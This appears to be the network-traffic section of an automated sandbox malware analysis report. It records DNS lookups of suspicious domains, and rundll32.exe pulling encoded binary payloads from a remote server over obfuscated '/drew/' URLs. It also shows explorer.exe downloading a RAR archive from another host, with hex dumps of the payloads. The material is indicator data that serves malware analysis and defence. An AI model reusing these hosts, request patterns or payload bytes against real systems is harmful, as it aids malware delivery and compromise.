                                                        May 4, 2022 16:20:28.500524998 CEST6491253192.168.2.4208.67.222.222
                                                        May 4, 2022 16:20:28.516555071 CEST5364912208.67.222.222192.168.2.4
                                                        May 4, 2022 16:21:22.481286049 CEST5225653192.168.2.48.8.8.8
                                                        May 4, 2022 16:21:22.822657108 CEST53522568.8.8.8192.168.2.4
                                                        May 4, 2022 16:21:34.199577093 CEST5225753192.168.2.48.8.8.8
                                                        May 4, 2022 16:21:34.216151953 CEST53522578.8.8.8192.168.2.4
                                                        May 4, 2022 16:21:34.217381001 CEST5225853192.168.2.48.8.8.8
                                                        May 4, 2022 16:21:34.233515024 CEST53522588.8.8.8192.168.2.4
                                                        May 4, 2022 16:22:22.387646914 CEST6431653192.168.2.48.8.8.8
                                                        May 4, 2022 16:22:23.374944925 CEST6431653192.168.2.48.8.8.8
                                                        May 4, 2022 16:22:24.391297102 CEST6431653192.168.2.48.8.8.8
                                                        May 4, 2022 16:22:26.422003031 CEST6431653192.168.2.48.8.8.8
                                                        May 4, 2022 16:22:27.404277086 CEST53643168.8.8.8192.168.2.4
                                                        May 4, 2022 16:22:28.391235113 CEST53643168.8.8.8192.168.2.4
                                                        May 4, 2022 16:22:29.407274961 CEST53643168.8.8.8192.168.2.4
                                                        May 4, 2022 16:22:31.437788963 CEST53643168.8.8.8192.168.2.4

                                                        ICMP Packets

                                                        TimestampSource IPDest IPChecksumCodeType
                                                        May 4, 2022 16:22:28.391390085 CEST192.168.2.48.8.8.8cff2(Port unreachable)Destination Unreachable
                                                        May 4, 2022 16:22:29.407473087 CEST192.168.2.48.8.8.8cff2(Port unreachable)Destination Unreachable
                                                        May 4, 2022 16:22:31.437877893 CEST192.168.2.48.8.8.8cff2(Port unreachable)Destination Unreachable

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                        May 4, 2022 16:20:28.160969973 CEST192.168.2.48.8.8.80x78a7Standard query (0)resolver1.opendns.comA (IP address)IN (0x0001)
                                                        May 4, 2022 16:20:28.271305084 CEST192.168.2.4208.67.222.2220x1Standard query (0)222.222.67.208.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                        May 4, 2022 16:20:28.291598082 CEST192.168.2.4208.67.222.2220x2Standard query (0)myip.opendns.comA (IP address)IN (0x0001)
                                                        May 4, 2022 16:20:28.500524998 CEST192.168.2.4208.67.222.2220x3Standard query (0)myip.opendns.com28IN (0x0001)
                                                        May 4, 2022 16:21:22.481286049 CEST192.168.2.48.8.8.80x82a5Standard query (0)cabrioxmdes.atA (IP address)IN (0x0001)
                                                        May 4, 2022 16:21:34.199577093 CEST192.168.2.48.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                        May 4, 2022 16:21:34.217381001 CEST192.168.2.48.8.8.80x2Standard query (0)1.0.0.127.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                        May 4, 2022 16:22:22.387646914 CEST192.168.2.48.8.8.80x5bcdStandard query (0)gamexperts.netA (IP address)IN (0x0001)
                                                        May 4, 2022 16:22:23.374944925 CEST192.168.2.48.8.8.80x5bcdStandard query (0)gamexperts.netA (IP address)IN (0x0001)
                                                        May 4, 2022 16:22:24.391297102 CEST192.168.2.48.8.8.80x5bcdStandard query (0)gamexperts.netA (IP address)IN (0x0001)
                                                        May 4, 2022 16:22:26.422003031 CEST192.168.2.48.8.8.80x5bcdStandard query (0)gamexperts.netA (IP address)IN (0x0001)

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                        May 4, 2022 16:20:28.177081108 CEST8.8.8.8192.168.2.40x78a7No error (0)resolver1.opendns.com208.67.222.222A (IP address)IN (0x0001)
                                                        May 4, 2022 16:20:28.287652969 CEST208.67.222.222192.168.2.40x1No error (0)222.222.67.208.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                        May 4, 2022 16:20:28.287652969 CEST208.67.222.222192.168.2.40x1No error (0)222.222.67.208.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                        May 4, 2022 16:20:28.287652969 CEST208.67.222.222192.168.2.40x1No error (0)222.222.67.208.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                        May 4, 2022 16:20:28.307825089 CEST208.67.222.222192.168.2.40x2No error (0)myip.opendns.com102.129.143.40A (IP address)IN (0x0001)
                                                        May 4, 2022 16:21:22.077512026 CEST8.8.8.8192.168.2.40x4708No error (0)l-0007.l-dc-msedge.net13.107.43.16A (IP address)IN (0x0001)
                                                        May 4, 2022 16:21:22.822657108 CEST8.8.8.8192.168.2.40x82a5No error (0)cabrioxmdes.at116.121.62.237A (IP address)IN (0x0001)
                                                        May 4, 2022 16:21:22.822657108 CEST8.8.8.8192.168.2.40x82a5No error (0)cabrioxmdes.at175.126.109.15A (IP address)IN (0x0001)
                                                        May 4, 2022 16:21:22.822657108 CEST8.8.8.8192.168.2.40x82a5No error (0)cabrioxmdes.at37.75.50.246A (IP address)IN (0x0001)
                                                        May 4, 2022 16:21:22.822657108 CEST8.8.8.8192.168.2.40x82a5No error (0)cabrioxmdes.at110.14.121.125A (IP address)IN (0x0001)
                                                        May 4, 2022 16:21:22.822657108 CEST8.8.8.8192.168.2.40x82a5No error (0)cabrioxmdes.at187.190.48.60A (IP address)IN (0x0001)
                                                        May 4, 2022 16:21:22.822657108 CEST8.8.8.8192.168.2.40x82a5No error (0)cabrioxmdes.at148.0.88.95A (IP address)IN (0x0001)
                                                        May 4, 2022 16:21:22.822657108 CEST8.8.8.8192.168.2.40x82a5No error (0)cabrioxmdes.at183.78.205.92A (IP address)IN (0x0001)
                                                        May 4, 2022 16:21:22.822657108 CEST8.8.8.8192.168.2.40x82a5No error (0)cabrioxmdes.at178.31.115.10A (IP address)IN (0x0001)
                                                        May 4, 2022 16:21:22.822657108 CEST8.8.8.8192.168.2.40x82a5No error (0)cabrioxmdes.at187.212.195.33A (IP address)IN (0x0001)
                                                        May 4, 2022 16:21:22.822657108 CEST8.8.8.8192.168.2.40x82a5No error (0)cabrioxmdes.at91.139.196.113A (IP address)IN (0x0001)
                                                        May 4, 2022 16:21:34.216151953 CEST8.8.8.8192.168.2.40x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                        May 4, 2022 16:21:34.233515024 CEST8.8.8.8192.168.2.40x2Name error (3)1.0.0.127.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
                                                        May 4, 2022 16:22:27.404277086 CEST8.8.8.8192.168.2.40x5bcdServer failure (2)gamexperts.netnonenoneA (IP address)IN (0x0001)
                                                        May 4, 2022 16:22:28.391235113 CEST8.8.8.8192.168.2.40x5bcdServer failure (2)gamexperts.netnonenoneA (IP address)IN (0x0001)
                                                        May 4, 2022 16:22:29.407274961 CEST8.8.8.8192.168.2.40x5bcdServer failure (2)gamexperts.netnonenoneA (IP address)IN (0x0001)
                                                        May 4, 2022 16:22:31.437788963 CEST8.8.8.8192.168.2.40x5bcdServer failure (2)gamexperts.netnonenoneA (IP address)IN (0x0001)

                                                        HTTP Request Dependency Graph

                                                        • 185.189.151.28
                                                        • 193.56.146.127
                                                        • cabrioxmdes.at

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        0192.168.2.449761185.189.151.2880C:\Windows\SysWOW64\rundll32.exe
                                                        TimestampkBytes transferredDirectionData
                                                        May 4, 2022 16:19:17.575335979 CEST1167OUTGET /drew/VaQ3pTys7Q2R6kpf/_2FIc_2F8CXvB3Z/iOcDCMv_2Bzt_2BkvD/0oAvhggmG/_2Fl1lo2G6zaBPziefOU/0weuiBbGeNMoLKM6iCO/t_2BCeHyFsnS9bYnhwNoEp/71L2csZUwuj6M/Di72h_2F/YKcRH2nZoqJfjSIVybnSQum/ojRn6CbyHg/HZSkJJ16taI_2BtJ_/2BPgmXmwBiuC/GeqX1VmOJwL/BLm5b43yKc8DM1/cAyjDLhuSh3YL8e2h3G86/An0inHEid52NS1pJ/fzGWg5Z6i/S.jlk HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                        Host: 185.189.151.28
                                                        Connection: Keep-Alive
                                                        Cache-Control: no-cache
                                                        May 4, 2022 16:19:17.863269091 CEST1168INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Wed, 04 May 2022 14:19:17 GMT
                                                        Content-Type: application/octet-stream
                                                        Content-Length: 186001
                                                        Connection: keep-alive
                                                        Pragma: public
                                                        Accept-Ranges: bytes
                                                        Expires: 0
                                                        Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                        Content-Disposition: inline; filename="62728b65cf5d2.bin"
                                                        Data Raw: 90 fe 16 00 dd 20 a6 90 00 22 81 96 31 0c 06 ee 2c a0 48 f2 36 47 2b a8 1f 78 fb 84 fe 80 bc 68 83 a3 b0 1b 36 53 4b 75 0f a7 82 72 a1 41 e1 ff 47 06 9d 2a 90 8e 26 f8 83 6e 4c 7a ba 23 11 cb 7a c4 b5 76 5c eb 93 5b 14 3c c9 98 a5 e3 8b c6 36 cc 13 99 54 83 1a 4c 7b 46 49 91 17 ea 3b bb 0c 41 7e bf 1b 94 ad a3 32 05 aa 3b b0 4f 0c cb fc da 60 91 e2 bd 0d 03 9d 3c bd a2 dd d7 3f 0f 94 dc e3 06 b6 33 92 7e 82 88 84 01 f1 a2 02 d5 be cd 05 f8 80 06 a7 6e 5b 13 39 e7 33 43 f9 ee 65 41 c1 09 48 5c 39 3b 96 45 42 2c d6 0e 26 1b 0d 07 a7 4a 31 10 18 b4 36 c2 cb 88 ce 0e 68 30 dd c9 12 ff 5a 51 b6 1f 27 30 1a 25 a6 fb 5f b1 43 86 48 4a be 41 1d 15 20 30 a1 22 5a 46 58 f9 15 cc 69 9f 79 f8 78 b2 f1 f4 64 27 68 96 aa c1 73 d4 a7 58 3d ff ca 94 06 f9 ff 3e aa d1 00 6e c4 9d 6b 43 ac 0c 73 10 7f 0a 46 6d a9 74 29 b7 65 25 b5 77 93 76 25 7a b8 d9 0d 9c 83 ab 02 b1 78 eb 7b 8d 01 61 4d 6f 2e 0a da b3 c7 26 36 df 2a 95 d4 bf df d3 28 b1 c4 44 91 f7 ed 03 59 40 3e 4e f4 f3 2c 45 08 6c ca 1e 96 ba cc 33 c6 d6 79 6e fe fc 1f 27 b2 8a 2c 3c 8b e3 b4 14 90 a6 c2 99 62 62 09 88 68 9b e5 5d 5a 1b 90 23 e3 3f 1e 37 65 79 84 54 e6 fa 2d 39 d0 ab 72 5f 30 51 17 b6 8d 50 6c f0 28 5a 7e 77 5d 4f e7 c7 d6 f5 10 1c e5 da 36 7b 84 8e 94 d4 b7 df fa ab aa 17 53 ac e3 5b b0 72 c2 c8 65 0a a1 68 34 7f bd db 5d 00 76 de 42 e5 35 53 61 1f b2 46 e4 5d b5 7e a8 1e 4b 28 b7 9d 61 42 3c ec 8f ef c7 31 1c 8f 4c 68 8c 93 db e0 4b 86 ff 36 5e 8b e5 b6 46 f3 43 2c c5 92 03 de c3 8a 33 76 52 de 17 e1 6a 06 82 43 9b 7d 58 a6 f9 59 d0 35 f8 22 ec 02 92 5f c2 94 98 f9 9c 96 72 7e 76 47 66 f2 a7 7b 29 58 64 8a b4 df fe fc 78 4c 1b 45 88 71 86 ab 44 26 65 5b 29 85 31 04 6f 88 9a 15 b6 69 e2 90 95 32 fe 62 fe a0 0f 8f 8d 27 8d d0 63 31 96 18 ad c3 68 6d 1c 70 e8 65 66 f8 3d 34 d6 fb 93 0e 68 95 ae 3f 77 85 3e f6 c2 fd bd a3 12 e3 f3 a6 45 7e 74 c5 8b 22 2b 46 9f b3 fb 84 39 cc c4 6e 5f 09 3e cf c2 0b 7a d8 1a a2 f7 8f d2 7c c9 c7 0a 86 fa 2f c2 c4 67 c1 14 c1 36 f4 7e ca 10 53 88 8f 87 0c 9a d8 40 02 b6 78 d9 3c 5d 0e 45 6d e7 1a 21 99 b0 29 1b e3 e0 c0 2b 02 47 bc 53 00 3c 8a 66 74 ca 12 c0 49 dc 75 43 18 6a 42 18 c7 9e 0b 55 fd 45 f0 5b 24 3a b5 3c 10 b5 a7 10 c7 28 d0 c7 35 3f 54 35 0e 43 41 1d bf f5 f3 9a f4 ff 81 26 48 fc 80 5f f1 f8 71 99 e4 0e 17 6a 1c 75 5d 64 95 f7 e1 88 a2 00 94 90 5f 6c d5 cd fc a5 72 b7 b6 e5 e8 5a 13 63 f5 4b b5 8e f2 82 41 64 7f ad 8e bd e9 6e 51 d0 ef ec 63 ab 78 09 ea e7 8c 71 e8 5b 12 a9 e1 0c 48 ed cb 06 da f3 7d ca 85 d7 45 2a 4b b1 c5 1c 9e 75 8e 33 0a 02 a8 57 71 0d b4 5c b3 46 dc 38 88 72 5b 66 00 55 4f 00 28 2c 61 67 7b 85 11 64 8c 84 de df 2f 2c 69 eb ba a7 86 a4 d1 ce df aa e3 93 48 d5 31 9a b5 8c e4 87 f9 e2 a0 e3 0c 04 b3 c4 40 f7 0f 35 de fc 0b d9 d3 2a 45 b4 91 93 26 51 19 8d f2 45 67 3b ed ed 42 e2 04 cd 3e 9c e7 c6 6f 15 1b aa 04 9e d3 e4 9f c4 7b 67 37 b7 40 48 05 e7 10 93 59 8a 81 f5 ca 77 22 e4 64 f5 a9 d5 0a 81 0e 53 8f c5 43 23 2d 3d 0f e4 a2 8a df c3 7b 13 3e 33 04 8c 56 2d 62 47 40 39 58 13 9c 69 1e b2 1f da 02 b7 59 0b d1 3e
                                                        Data Ascii: "1,H6G+xh6SKurAG*&nLz#zv\[<6TL{FI;A~2;O`<?3~n[93CeAH\9;EB,&J16h0ZQ'0%_CHJA 0"ZFXiyxd'hsX=>nkCsFmt)e%wv%zx{aMo.&6*(DY@>N,El3yn',<bbh]Z#?7eyT-9r_0QPl(Z~w]O6{S[reh4]vB5SaF]~K(aB<1LhK6^FC,3vRjC}XY5"_r~vGf{)XdxLEqD&e[)1oi2b'c1hmpef=4h?w>E~t"+F9n_>z|/g6~S@x<]Em!)+GS<ftIuCjBUE[$:<(5?T5CA&H_qju]d_lrZcKAdnQcxq[H}E*Ku3Wq\F8r[fUO(,ag{d/,iH1@5*E&QEg;B>o{g7@HYw"dSC#-={>3V-bG@9XiY>
                                                        May 4, 2022 16:19:18.765868902 CEST1367OUTGET /drew/ftkCw_2FHRlZ2H4Ez/kZzLPSWW1EjO/vrmRPaaHdKz/qSrMackZ3zyqc0/VWwRh_2FwCauXlH76SpSQ/WebWjWKotWlEjZol/i0khlMGcdRnqbLJ/HlNBrT1E6GXaxDAWHo/UE921lN_2/FjqHF75OT4VsLwnjVixS/PbEwWP4onYE8hLJvBBX/d_2BgNcvh2ZXGjR5_2FyXa/S5_2BQHrje5lp/MVCT87wg/yCb3LwnNfDTI2igwyNHJuPu/wEyNxQ1wIj/6Ok6nHxwE/MHgaOPodjh/7.jlk HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                        Host: 185.189.151.28
                                                        Connection: Keep-Alive
                                                        Cache-Control: no-cache
                                                        May 4, 2022 16:19:19.058303118 CEST1368INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Wed, 04 May 2022 14:19:19 GMT
                                                        Content-Type: application/octet-stream
                                                        Content-Length: 238738
                                                        Connection: keep-alive
                                                        Pragma: public
                                                        Accept-Ranges: bytes
                                                        Expires: 0
                                                        Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                        Content-Disposition: inline; filename="62728b670adf7.bin"
                                                        Data Raw: 3b 4c 6b f7 b7 25 70 03 88 2d 7a 37 9e a1 c8 64 0b d8 31 31 97 0f c5 b0 5f f3 81 6d 9e c3 45 83 0a 34 18 f9 2a 0e ff 72 ff c7 33 d5 29 5d 81 f6 a5 6c 33 59 c7 fc d9 7d 59 a6 2c 44 a0 08 b0 48 8b 5c 88 ed 4d 9c 4e f2 9c 04 cf da 87 8f fc 28 44 1b 1f d6 84 bb dc 53 47 f0 25 da f7 b6 56 48 26 5b 83 11 f9 80 79 d3 3f ab 3f 7b 8a 14 23 8f 4d 34 6e a5 8d 52 88 cb c6 51 bd 4e 27 49 d6 ba 33 30 b3 e5 52 76 59 f9 49 45 bb 09 82 03 75 7c e0 12 67 43 e1 33 8e b9 58 1e 5a b6 16 2b cf ae 0e 8d cd e6 c9 bb 31 32 9c b6 7f 38 ef b7 14 c5 6b 56 72 db db f5 20 42 b0 21 7b c2 d3 e4 6b fa b6 29 2f 63 6f 43 cf fd 33 d1 f1 f3 33 82 eb 56 90 92 b4 a4 9c 0b 34 10 8d ed df d7 30 79 ee 6a 70 e6 2e 5b 2f d9 bf ad 8c 81 5f ec d7 15 c8 85 f6 42 0f 37 b8 b0 93 ac a1 85 c4 23 5e e0 43 b2 f2 93 6a d4 39 18 f6 17 0d d7 36 b6 2c 4f 0e 34 06 73 fa a7 52 3b a0 32 82 5c f1 6b e4 7a 99 fc 8d 27 58 8a 96 1b 31 e8 14 ee 43 b7 d2 fb 67 09 cb 2e 03 64 ad e4 8a 6a 5f 40 27 ac a0 21 ac cd 7a c6 94 f3 0b 04 1c f4 15 03 a5 59 24 02 68 2c 35 6a 8b 51 d7 90 e5 d9 30 8a 7f dc c2 68 ae 3c 42 9a 5c 68 06 a5 c2 c4 6e 0f ef 64 32 4f 69 ab 18 b4 9e 99 1f f5 05 56 47 02 8e 9f 27 d4 ff 10 20 e7 ed cd b1 4b 87 6e 27 42 1e 3e 24 80 4a 04 3c a3 49 30 16 f6 80 ec ff 7f 69 7e 67 e9 15 f7 0c 8d 63 a1 52 09 e9 b1 0e 05 e9 aa 92 c3 6e a8 af a5 9b c3 81 03 f7 56 3b 62 cc 61 4a 47 01 5f 44 7c dd 73 98 b0 56 89 42 12 05 2f fd 1e 39 b9 f3 98 27 a9 28 d5 bc c4 8e a4 e7 ec ab 89 c4 ce 19 ea b9 9c 21 dc 88 24 ec 64 2b cb a0 eb bf ca ae d2 49 96 b6 8a 04 ab fa 95 77 fa 63 0a 7a 0d 95 a1 96 99 44 58 4c cf 57 ae a4 39 c8 34 1e 91 57 0a 36 63 09 ab 63 76 c2 c1 18 dd ac c2 70 bf 06 25 e6 27 5d fc f2 4f 2b 48 d4 2b 9b aa 75 25 b7 70 f5 86 3b 83 06 05 3f 10 6e 86 51 69 da a6 a8 0d 8f 67 9f 77 dd f3 f1 bc a3 2b 9b cc 07 3c cd d5 4d 2e 5b 8d 0a 6e f3 42 ee 85 31 81 12 49 42 23 da f6 e0 21 58 34 f1 98 44 20 e0 34 20 6c e2 a7 e9 96 39 bf 64 eb 96 ab af dd c2 e5 93 2f 77 12 5b 31 b6 d4 8e 98 e1 b0 b9 97 01 7b 07 2a 86 59 bd e8 00 a8 a3 36 12 48 2c f4 25 13 19 ba df bb ee 61 56 99 a8 ad 21 38 93 bd 47 26 58 af f0 db 46 7b b6 65 aa de cd dc 57 71 ed 57 29 3c a1 90 6f b4 ca a6 dc 2b a1 45 2a 15 3d 27 0d 14 ac e3 a7 f3 ce f4 a4 99 60 7c d7 95 79 41 ca 61 9a 6f 54 40 1a 4e 73 8d c8 57 85 c6 32 d8 e6 76 bd 9e 2b c8 77 57 64 55 68 1e e8 b8 ce e3 27 ea 88 e0 6b 84 d6 22 a8 40 53 1f fe fd 7f 2c 64 e5 e3 c0 ba b0 7c 8c 1f 0a 1f 3d a3 aa df 4c 84 66 69 de c4 52 16 4a cb 9d 1b 22 74 04 be b4 75 aa ac 10 43 9c 84 24 1d 8b bb 5b c6 a9 da 99 7a c4 10 3c d8 88 4e 6f 5d 84 05 33 69 2b e5 f6 16 bf 76 b7 e2 b7 61 1a 36 95 4b 28 79 75 83 0d af 82 36 39 fb e4 c0 3c c2 32 b4 cc c4 35 09 29 45 a8 bf a7 f5 c5 b1 91 71 b2 a5 a9 77 0d 1f 79 f3 f3 6c a3 ab 52 a9 26 9e df 64 d9 64 a6 4f 74 f8 7f be 12 b6 01 54 bd bc e1 a6 7e 85 e2 01 e7 11 f6 40 6c 49 4a e2 ec 18 e1 9b c7 7e 26 d7 09 41 4c b1 bd cb b6 91 c6 24 7f 1a 3d 1b 36 89 c0 c2 20 6c 33 01 13 79 75 f9 66 8c 40 13 41 38 66 3a 0f 9b 37 54 93 3b 5b 14 19 90 ea 68 99 54 78 3a f9 f4 73 f6
                                                        Data Ascii: ;Lk%p-z7d11_mE4*r3)]l3Y}Y,DH\MN(DSG%VH&[y??{#M4nRQN'I30RvYIEu|gC3XZ+128kVr B!{k)/coC33V40yjp.[/_B7#^Cj96,O4sR;2\kz'X1Cg.dj_@'!zY$h,5jQ0h<B\hnd2OiVG' Kn'B>$J<I0i~gcRnV;baJG_D|sVB/9'(!$d+IwczDXLW94W6ccvp%']O+H+u%p;?nQigw+<M.[nB1IB#!X4D 4 l9d/w[1{*Y6H,%aV!8G&XF{eWqW)<o+E*='`|yAaoT@NsW2v+wWdUh'k"@S,d|=LfiRJ"tuC$[z<No]3i+va6K(yu69<25)EqwylR&ddOtT~@lIJ~&AL$=6 l3yuf@A8f:7T;[hTx:s
                                                        May 4, 2022 16:19:19.326271057 CEST1619OUTGET /drew/j2JffNlXTHLPSjvkab/vvawbyEnZ/Hwlvs3aqIXBaZtIhRcgj/4HXnxsMpDrDAMvyWm_2/FmVqdMEPLr3zfDmaxNGUay/bz_2BSMy1l2QZ/EUwY7mKI/BhGCRzr1OkkgVWxbqU3mkVE/wA3v0qd0nJ/5B7wfgqElhGpmz3sa/_2F6sQ8OT_2B/8xTtmUQcdaG/oTkIYSJR4gLWwl/QQTNVlqw4bQdTnzAZ6CQ7/k1kym0P_2B_2FUsc/x2oonw84wvEvNXM/7_2BWWPnJGDR/PuJeNv7kx/T.jlk HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                        Host: 185.189.151.28
                                                        Connection: Keep-Alive
                                                        Cache-Control: no-cache
                                                        May 4, 2022 16:19:19.626909018 CEST1620INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Wed, 04 May 2022 14:19:19 GMT
                                                        Content-Type: application/octet-stream
                                                        Content-Length: 1856
                                                        Connection: keep-alive
                                                        Pragma: public
                                                        Accept-Ranges: bytes
                                                        Expires: 0
                                                        Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                        Content-Disposition: inline; filename="62728b6793eb1.bin"
                                                        Data Raw: 9b a0 46 9f fb 74 7e 4c 02 9a 3e fd d9 71 c7 75 b7 c0 cf a4 f1 8f 69 7b ca 68 40 93 06 4e b2 61 6c 45 b6 60 ec c8 ae 61 ba a7 30 65 32 00 93 c4 61 b5 26 75 0f 9c 24 d6 6b 8d 49 83 bd 29 e5 c2 8e 84 e2 03 a7 53 8f 50 53 4e 60 d2 b0 83 79 b0 30 aa 56 2b de 37 b8 1e 29 a1 fe 12 f0 a4 8a b6 1c 50 54 8d e2 11 22 11 00 28 bf 5a 8e 88 5c f1 a5 ea 66 e4 d9 1d 25 32 3c 0d b9 88 74 8f 8e 4d dd 6f 8d 0c ff 3b fb ab 12 a8 aa 7b 3c 4a 84 d1 1c 81 c0 03 d3 5a f7 ca 0e 84 a2 cd bf 4b 4b 8a 9a a7 0b 3b 18 09 93 80 bd 2c 22 aa 10 18 d9 46 7f 3f 4a 98 a1 32 15 53 4d 52 37 e7 3d fc df 0b 99 86 dc 6e 28 45 31 41 af 5b f3 54 b8 c3 c4 0e de b4 8c 35 e7 ae 58 26 d9 51 48 2a a9 7c 38 bf 34 02 be a4 a2 60 c2 f2 a1 0b a5 b7 b8 45 00 65 8d 87 9e 0f 13 57 99 55 9c 6f 29 be 48 cb 2b 94 3e 15 dc a9 ca 66 19 e4 4b 96 5f 82 fb 25 15 6c e8 81 ba c7 c6 11 8f a6 22 f3 d3 46 8e 0a 4e a3 47 a3 43 c4 28 a9 04 8e 33 96 50 fc ff da 85 d8 1a 90 b6 c3 b6 70 00 35 37 e8 e0 9b 16 3a 8f 42 cc df f8 46 d9 65 92 fb a4 09 89 80 4b ed 32 53 0c fb 12 10 01 3c a7 65 18 1f 85 a3 3d 19 3b 35 60 ca 34 5d 34 52 31 52 97 a4 f7 e9 c8 a8 6d fd aa 00 d9 1a 03 b4 cf d3 6b 1d c9 a9 fb 98 be 9e ee 6e 98 aa dc 13 43 f5 f1 a4 c8 15 60 ac 89 bc 66 0e c3 5c 86 cf 87 08 78 b0 d7 93 ca a5 f3 d7 df 9f 82 0e 0c 47 f8 ba bb 22 96 1d 41 af ad 20 bb 3b f4 7c 43 d6 33 6b c5 a7 00 ad c7 e3 85 36 3d a9 cd ff 43 13 5d 1a 98 65 a5 39 a0 04 97 16 f2 aa 48 11 c3 92 11 ad e2 6c a1 be f1 26 93 a6 ac 32 e7 cb 42 6c f0 44 33 e2 1d 8e ae 3e b7 6c 0e 9d d6 61 ea 8a 3d 3b f9 10 d5 5e 6f e6 95 69 c6 71 9b d9 76 5a d7 a6 6d 73 3c 9c 16 98 fe 91 6c 22 21 a9 0d a3 b8 32 ec 0c e2 56 21 bd 0f b2 d9 7d 28 84 dc 5c 0a d0 73 cb ab bd 78 b6 e9 06 c7 a0 94 a6 59 4e d2 71 5b 21 08 5b 65 ac e4 58 76 1e 02 c8 9f 0d dd e0 90 25 a2 63 d5 df 0d 62 e9 e1 79 ab 4a 3b 73 dc 24 a2 34 4b 8e f7 84 e2 34 b7 48 aa f8 38 8e 40 82 ea 3e f7 65 c4 e9 55 1e 1c 09 eb 5f e8 d6 e0 be 03 c7 53 d9 7b 75 89 9d 91 ca e8 cf 8b fc 0e a2 1d 8b 29 79 32 6b ce 7d 50 cd 11 62 8e 9f e2 49 17 42 32 80 05 48 f4 b4 02 6d 95 48 d1 8f cf 58 79 80 88 10 83 25 2d 9c d3 a5 62 18 d5 cb e7 f6 ab c9 05 71 9d 97 91 57 12 95 83 e4 1e 21 ce 98 59 64 61 16 0c bc 86 44 3f 1e 63 85 6a b9 bb dc da c8 93 85 f0 15 ac 87 e7 0f bb 30 62 68 64 d9 35 20 8f a7 46 82 e0 bf e8 92 a0 37 1b 44 4e 09 c2 70 7b 5d ca 65 06 92 d7 1f 02 40 68 d8 f9 ce fe 22 b9 52 d6 37 3d 79 f5 4c bd 14 0c 30 6c e6 2b 48 c0 26 30 b8 43 9d de c8 55 66 eb 9d 88 ce 14 7f 49 50 c5 3f 64 97 0f 7a 4f 48 80 11 af 12 1c 95 66 bf ed ec e1 bd 12 35 7c da 51 24 8f b3 9f f8 1f 9b c0 d9 50 46 63 0f d2 4e 5c 43 00 32 a9 65 5a c3 30 73 8d 98 fa ff 3a 7d c3 b4 d5 ea d1 45 9c 4b 6c 69 1c f6 b4 3a 55 5c 5c 0e de 2a c7 47 93 6d ec 2b 02 99 c6 7b 5d ce 41 e3 ee c9 91 46 6e d4 10 d2 83 3e f6 91 b5 c3 ce d1 b9 12 29 94 e4 5a 7d ac dd 03 fc 4e 8f 4c 65 3e b6 12 c0 2b 6d 73 2a f6 b1 df bd a5 1d 5a 13 b6 7f a5 ca e1 33 ca 6b a4 88 3e c4 2e dd b1 9f 2c 6b 18 5e de cf fe 3b 59 3c 35 5f cf 58 4b 80 b6 2b aa 8f fe 2c ed d8 3b 2e 42 bb af 6f c1
                                                        Data Ascii: Ft~L>qui{h@NalE`a0e2a&u$kI)SPSN`y0V+7)PT"(Z\f%2<tMo;{<JZKK;,"F?J2SMR7=n(E1A[T5X&QH*|84`EeWUo)H+>fK_%l"FNGC(3Pp57:BFeK2S<e=;5`4]4R1RmknC`f\xG"A ;|C3k6=C]e9Hl&2BlD3>la=;^oiqvZms<l"!2V!}(\sxYNq[![eXv%cbyJ;s$4K4H8@>eU_S{u)y2k}PbIB2HmHXy%-bqW!YdaD?cj0bhd5 F7DNp{]e@h"R7=yL0l+H&0CUfIP?dzOHf5|Q$PFcN\C2eZ0s:}EKli:U\\*Gm+{]AFn>)Z}NLe>+ms*Z3k>.,k^;Y<5_XK+,;.Bo


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        1192.168.2.449823193.56.146.12780C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        May 4, 2022 16:21:18.561359882 CEST11244OUTGET /stilak32.rar HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
                                                        Host: 193.56.146.127
                                                        Connection: Keep-Alive
                                                        Cache-Control: no-cache
                                                        May 4, 2022 16:21:18.631387949 CEST11245INHTTP/1.1 200 OK
                                                        Server: nginx/1.14.2
                                                        Date: Wed, 04 May 2022 14:21:18 GMT
                                                        Content-Type: application/x-rar-compressed
                                                        Content-Length: 345746
                                                        Last-Modified: Tue, 25 Jan 2022 14:33:43 GMT
                                                        Connection: keep-alive
                                                        ETag: "61f00a47-54692"
                                                        Accept-Ranges: bytes
